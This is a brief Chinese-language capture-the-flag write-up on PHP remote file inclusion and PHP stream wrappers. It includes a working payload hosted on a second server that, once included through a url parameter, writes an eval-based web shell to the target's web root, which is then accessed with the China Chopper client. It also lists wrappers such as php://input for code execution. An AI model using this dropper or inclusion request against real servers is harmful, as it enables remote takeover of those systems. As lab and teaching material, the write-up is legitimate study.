一道简单的题，学习远程文件包含与伪协议

题目描述：

方法一：

使用url实现php远程文件包含

在服务器上构造1.txt

<?php$a = "<?php eval(\$_POST[‘123‘])?>";$b = fopen("a.php","w") or die("123!");fwrite($b,$a);fclose($b);?>

访问：

http://ip1/index.php?url=http://ip2/1.txt

在根目录生成a.php

使用菜刀连接，获得flag。

方法二：php 伪协议

PHP支持的伪协议如下：

file:// — 访问本地文件系统 必须是绝对路径http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流（I/O streams）php://input 将post请求的数据当作php代码执行zlib:// — 压缩流data:// — 数据（RFC 2397）glob:// — 查找匹配的文件路径模式phar:// — PHP 归档ssh2:// — Secure Shell 2rar:// — RARogg:// — 音频流expect:// — 处理交互式的流

在php.ini里有两个重要的参数allow_url_fopen和allow_url_include

allow_url_fopen:默认值是ON，允许url里的封装协议访问文件allow_url_include:默认值是OFF,不允许包含url里的封装协议包含文件